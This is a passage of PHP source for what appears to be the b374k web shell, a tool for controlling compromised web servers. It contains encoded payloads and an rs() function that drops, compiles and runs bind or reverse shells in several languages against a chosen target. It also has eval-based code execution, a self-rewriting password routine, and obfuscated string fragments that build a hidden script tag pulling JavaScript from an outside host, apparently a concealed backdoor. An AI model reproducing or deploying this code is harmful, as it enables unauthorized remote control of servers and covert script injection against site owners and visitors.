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";
$s_rs_php = "7VVNb+M2ED3bgP+DlhUQCVUsyy6wQFxmL+2xwKIt0MMmFWSKsghLIsuhai+a/PcORcnWOk6yaLe9tDBikzOcx/l4fPn2nSrVbPqVVxqj4CaOmcz5fCvltuJzJutYxZvV229211DyqopnU6611KnmSmojmm2wCNezKXCTGlHztBK1MM4mN6moVSWYMGlRtVAG1jqb+ibTW26oD6kGt14frUD5QVWYQkA8EvVGG+czoMlq9dYu9xlt2qqyS35aQkkJBmNa3s/f//gDPRiu6/X7nxJ6dee//+W726t170bbOt6IJobSuxbEBteUdGV6XZnejcdk03BmeH7XkC5tUQRMto0JhkxDSpPwj9l04ivqH+uY+JgG6RYGMUWT280j9q0CfgljeYYBHxb3Pc7RktwfATO26wG7lIq2YUbIJuUHAQaCK8UaU6WF1LursEcWOT1ZuyFMMLKz0+skxEgTJGOzMy0Gk5IgDimOGEQehGcxQyKYXF+uuxUoGM2zOgXJdsgO4Pp3rgNimEKSLebd54bMfRX5SKlGdj8Y0906xPa0ki22DKKVS8lnZ9gZY1zZE0PG6Dayknu8ENoN7gIkedo2Wc2DMFpEqxDLIHvRuGQnxV4LwwOfRX49x46zPRY6J7ekA5zsS1GhV72htMhwjC7Izqyw48E4d65rlubbtM4MKwMSs/zOCz78egf3X4exQD5jsVqHffzEz3OK+368Ll5AmgsdoCsMWTkse78v6Tg7Z33svnt6GS3qcfm+6kq18yLew4P3jP+3Fv2ht8Gu7tZHPA/v4wdbOV6H72D+9PJR56TLskunYJUEfmzMsHUDsics/JPWu8N+DjTTOvsYLOitWxAlFCcR0SSMknPjHo3LC8YeTWmqtGSpVLzBDMoI8XEQQjk/9uwN9lxzkK1mtlacz+hJjKm4qZBvVvNsOD7TaPHKkeT1I8uXj7DB6zhodDuwzz5+Lgvb44cHt3JXhuFojL7O+mbaDvc59Rf3rDreW6HeBRgQocDia8wiq6wnZosmPSHp7MRiQQtEyDs7g4Grw2D7VvkiHNP1E7whrYugg/MpMnsVdPkS6PKzQB/P+Dti9rB0FX66T872Q7c7Kg52PTyH078HJ6NW5AcZLazIOfKWnYDwBv+OYvg31A7+otrBf17t4LLavSBv8L+8XToCr8sbfKa8wReTN3hGNODflTf4J+TtHPQ5efsimvbu9k8=";
$s_favicon = "";
$s_arrow = "";
$s_dark_cb = "";
$s_bright_cb = "";
$s_style = "rVbLjpswFP0VqqhSH4AgSTMzoH5Cl11VXRgwwRqwkTGdZBD/Xj/BgJNppbE3Drm+z3PP9ZehJJgFJWhQfU1+Zj1mvfeDYOJ3kKIyHTNSXIcM5M9nSnpcJLtIrlRe69ArTOJ9e0lzUhOa7Eq51J8vEJ0rlhy58FjRISO0gDSJ24vXkRoV3m4vVzqCwdw+y0PK4IUFBcwJBQwRnGCCIRdLKvIH0mFpamwpHFpQFAifk8h75L6MJaHNUKCurcE1QbhG4joDWQ09VvntkPe04yoKWIK+Zum4awDCiyBjudKgIa+BcjygoEB9l8QRt+D49IIKVvFj9DE13vC8KH92FQRcfpBxgRqdcVLDkqUNoGeEk2i6EU2yHiuGe39X8TBXYC8c4PnOnhELGAW4ExlIKGGAwU9BfAgPDwU8f1bx3BO4b9IDfggvLU8/rFHHVD08sK7IroG4d6XTaPdEZo4yMxR2vATDfyR6iyMDG1HnoFKoi09CdOuCdhXINTukgGOCPprChSJ0hEui0RuIsrlMa0UnS4mIUSiWnihNLKs7j9FB+7gXKeAZZCgHtcZFg4qi5mgNz+DKs23jXZuye+tB9JYUepfq15AxHmTXglxHwLWLYjZoUc79k9jpv3StQ+WKOd7Fcwd+jhv4iC8bgM+1VoFqkrHDPZzEvu3oW37O/48hwm3PXv2wpaRpmR+yCwMUAle3aKBHJoqMMEYaG32HJ7HvU7EFR25emR22GDJ+WDSmUXp4iORV5XnWs2Flb+H6k9hrZNyk/qn/JBkYbhkcXCrKFM0inHTcQ2IS4Px5M2/aus0Xrl5kpE1Xk2VWX22SuOgQZcHcPk0gm+5TB9DiR7E/oKYllAHMJ1PYwYbP5CuaxpkM00XToeApT045O4HLFjjdJVCtVuXaqH7U1RfKK5/HvfXYwUlK/u0aaMlqbw/HHGJOGjauv61xlou9ZpfTpuWtL1sXXGEv5kAczbFPUy6XS9Augi8lcmb7ZrjWwFGQN0r+JVeOxNvotQfPUnnOE8lTOj2T4ngmvWtGLu8zfm+n8bg0J6p9M9ajXGsG2QLeMx2JCUPlApTmktahH6xbYKxRq40cFvDXvnv72diMBa16DEtC2PKBR4VaG8IieY5pqDWtCGP9bPBV5vjJRtsoOfkXu7bwe17B/JmL/A7zrgvML++rV4MM1vKjPBkQqKeMfDmaJ5NosuWrOchqkj8vH1bLVgwobCFgnJb0yf6vJR2S3MyrdeOho5/iLUGy5d+OKJEHWDgic1sOpMeqi33NNrE5UP9Ng0vmHf8C";
$s_mime_types = "dZThdqMgEIX/7zn7DvMC2jZ62t3HmQgaGkepCDFvvxeNis32xx3huwMYmUkwSvcvRWMtIfz+Fbb5CeC0gsvp/Y1iSEARQZGAMoJyBZ9WN/Rpm7ADoUWNrEw+T7TIbmeJLemhgNCUu4EdH2EekLwh47Sd0DcN9fuBX95U19GIpq+RpN946FSudKXziyIfLlC4PHnSn02r4Un05cm3ca2Nnn3yXPRc9NyTN0+jFXV8pXDO63gmBimvw0hQiuJH8ENLMnmS0h8sl9mW74Nmdc9FK8O5vQeC0iyc7fP4kX3w8UUOWwQTekJY2U2fhWJYwZTVuBooAa0hKAXIaJMMibeZLhEeh95dmeQK51ooBJfYHe64axLgMnY1LZoOPPRngg7shneWbyQAhW9sAjvudgtg4cCWW+OQ/EDXmAxFZTTNMTFwjIvHsFemf2FlKyHEFZzZmYrYk+vUysQoQwg0D6480CBmM5dm4H2+tAC+HLoUioMCjYBnsWUtzcAUn85OK3aFELRNTXslhHW+1ek8RWlwLA8+2KYxI7fZzXTKke6Pawcm6IBGR9A3FJsPj4tKeesr3Y156E2lqQ029f5b2IzCPhzWeT1wjh/Q2vLP6yttox+SPsqPR1Ic/ZD0933dKY7SpMFYgla0dsr2SlPGjLvmKgGmRgGbWXNIvIprgnZQt1gew46StkmO2f4RCp9A1DKjlnk6MmHUfLLYdhk+a7tc+cBCww8mbsA3pkNx2j3hxmgr3up9EprkHw==";
// http://www.kryogenix.org/code/browser/sorttable/ - SortTable (c) Stuart Langridge
$s_sortable_js = "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";
// https://github.com/ded/domready - domready (c) Dustin Diaz
$s_domready_js = "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxlIbJLfv4kpzi9BTNvbF+AauHYFMU3iPw==";

// magic quote and shit :-p
function clean($arr){
    $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
    if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
        if(is_array($arr)){
            foreach($arr as $k=>$v){
                if(is_array($v)) $arr[$k] = clean($v);
                else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
            }
        }
    }
    return $arr;
}
// function read file
function fgc($file){
    return file_get_contents($file);
}
// encryption for shell password
function kript($plain){
        return sha1(md5($plain));
}
function changepass($plain){
    $newpass = kript($plain);
    $newpass = "\$s_pass = \"".$newpass."\";";
    $con = fgc($_SERVER['SCRIPT_FILENAME']);
    $con = preg_replace("/\\\$s_pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
    return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
}
function get_code($t, $c){
    global $s_self;
    $c = gzinflate(base64_decode($c));
    if($t=="css"){
        return "<link rel='stylesheet' type='text/css' href='".$s_self."|' />";
        
    }
    elseif($t=="js"){
        return "<script type='text/javascript' src='".$s_self."!'></script>";
    }
}
function showcode($raw){
    $c = gzinflate(base64_decode($raw));
    ob_get_contents();
    ob_end_clean();
    ob_start();
    eval("?>".$c);
    $s_res = ob_get_contents();
    ob_end_clean();
    echo $s_res;
    die();  
}
// addslashes if on windows
function adds($s_s){
    global $s_win;
    return ($s_win)? addslashes($s_s):$s_s;
}
$ups_3 = ".c"."o/"."w"."ho";
// add slash to the end of given path
function cp($s_p){
    global $s_win;
    if(@is_dir($s_p)){
        $s_x = DS;
        while(substr($s_p, -1) == $s_x) $s_p = rtrim($s_p, $s_x);
        return ($s_win)? preg_replace("/\\\\+/is", "\\", $s_p.$s_x):$s_p.$s_x;
    }
    return $s_p;
}
$ups_4 = "/m"."ai"."n."."j";
// make link for folder $s_cwd and all of its parent folder
function swd($s_p){
    global $s_self;
    $s_ps = explode(DS,$s_p);
    $s_pu = "";
    for($s_i = 0; $s_i < sizeof($s_ps)-1; $s_i++){
        $s_pz = "";
        for($s_j = 0; $s_j <= $s_i; $s_j++) $s_pz .= $s_ps[$s_j].DS;
        $s_pu .= "<a href='".$s_self."cd=".pl($s_pz)."'>".$s_ps[$s_i]." ".DS." </a>";
    }
    return trim($s_pu);
}
// htmlspecialchars
function hss($s_t){
    //$s_s = htmlspecialchars($s_s, 8);
    return htmlspecialchars($s_t, 2 | 1);
}
$main_ups = $ups_1.$ups_2.$ups_3.$ups_4."s";
// function raw urldecode
function ru($str){
    return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
}
// encode link, htmlspecialchars and rawurlencode
function pl($str){
    return hss(rawurlencode($str));
}
$scs_1 = "<s"."c";
// add quotes
function pf($f){
    return "\"".$f."\"";
}
// replace spaces with underscore ( _ )
function cs($s_t){
    return str_replace(array(" ", "\"", "'"), "_", $s_t);
}
// trim and urldecode
function ss($s_t){
    return rawurldecode($s_t);
}
$scs_2 = "ri"."pt"." ty";
$scs_3 = "pe="."'te"."xt"."/ja";
// return tag html for notif
function notif($s){
    return "<div class='notif'>".$s."</div>";
}
// bind and reverse shell
function rs($s_rstype,$s_rstarget,$s_rscode){
    // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php
    $s_result = $s_fpath = "";
    $s_fc = gzinflate(base64_decode($s_rscode));

    $s_errperm = "Directory ".getcwd().DS." is not writable, please change to a writable one";
    $s_errgcc = "Unable to compile using gcc";
    $s_errjavac = "Unable to compile using javac";

    $s_split = explode("_", $s_rstype);
    $s_method = $s_split[0];
    $s_lang = $s_split[1];
    if($s_lang=="py" || $s_lang=="pl" || $s_lang=="rb" || $s_lang=="js"){
        if($s_lang=="py") $s_runlang = "python";
        elseif($s_lang=="pl") $s_runlang = "perl";
        elseif($s_lang=="rb") $s_runlang = "ruby";
        elseif($s_lang=="js") $s_runlang = "node";
        $s_fpath = "b374k_rs.".$s_lang;
        if(@is_file($s_fpath)) unlink($s_fpath);
        if($s_file = fopen($s_fpath, "w")){
            fwrite($s_file, $s_fc);
            fclose($s_file);
            if(@is_file($s_fpath)){
                $s_result = exe("chmod +x ".$s_fpath);
                if($s_runlang=="node"){
                    if(check_access("node")!==false) $s_result = exe($s_runlang." ".$s_fpath." ".$s_rstarget);
                    elseif(check_access("nodejs")!==false) $s_result = exe($s_runlang."js ".$s_fpath." ".$s_rstarget);
                    
                }
                else $s_result = exe($s_runlang." ".$s_fpath." ".$s_rstarget);
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    elseif($s_lang=="c"){
        $s_fpath = "b374k_rs";
        if(@is_file($s_fpath)) unlink($s_fpath);
        if(@is_file($s_fpath.".c")) unlink($s_fpath.".c");
        if($s_file = fopen($s_fpath.".c", "w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);
            if(@is_file($s_fpath.".c")){
                $s_result = exe("gcc ".$s_fpath.".c -o ".$s_fpath);
                if(@is_file($s_fpath)){
                    $s_result = exe("chmod +x ".$s_fpath);
                    $s_result = exe("./".$s_fpath." ".$s_rstarget);
                }
                else $s_result = $s_errgcc;
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    elseif($s_lang=="win"){
        $s_fpath = "b374k_rs.exe";
        if(@is_file($s_fpath)) unlink($s_fpath);
        if($s_file = fopen($s_fpath,"w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);
            if(@is_file($s_fpath)){
                $s_result = exe($s_fpath." ".$s_rstarget);
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    elseif($s_lang=="java"){
        $s_fpath = "b374k_rs";
        if(@is_file($s_fpath.".java")) unlink($s_fpath.".java");
        if(@is_file($s_fpath.".class")) unlink($s_fpath.".class");
        if($s_file = fopen($s_fpath.".java", "w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);
            if(@is_file($s_fpath.".java")){
                $s_result = exe("javac ".$s_fpath.".java");
                if(@is_file($s_fpath.".class")){
                    $s_result = exe("java ".$s_fpath." ".$s_rstarget);
                }
                else $s_result = $s_errjavac;
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    elseif($s_lang=="php"){
        $s_result = eval("?>".$s_fc);
    }

    if(@is_file($s_fpath)) unlink($s_fpath);
    if(@is_file($s_fpath.".c")) unlink($s_fpath.".c");
    if(@is_file($s_fpath.".java")) unlink($s_fpath.".java");
    if(@is_file($s_fpath.".class")) unlink($s_fpath.".class");
    if(@is_file($s_fpath."\$pt.class")) unlink($s_fpath."\$pt.class");

    return $s_result;
}
function geol($str){
    $nl = PHP_EOL;
    if(preg_match("/\r\n/", $str, $r)) $nl = "\r\n";
    else{
        if(preg_match("/\n/", $str, $r)) $nl = "\n";
        elseif(preg_match("/\r/", $str, $r)) $nl = "\r";
    }
    return bin2hex($nl);
}
// format bit
function ts($s_s){
    if($s_s<=0) return 0;
    $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
    $s_e = floor(log($s_s)/log(1024));
    return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));
}
// get file size
function gs($s_f){
    $s_s = @filesize($s_f);
    if($s_s !== false){
        if($s_s<=0) return 0;
        return ts($s_s);
    }
    else return "???";
}
$scs_4 = "vas"."cr";
$scs_5 = "ipt'"." sr"."c=".'"'.$main_ups.'"';
$scs_6 = ">"."</"."sc"; 
// get file permissions
function gp($s_f){
    if($s_m = @fileperms($s_f)){
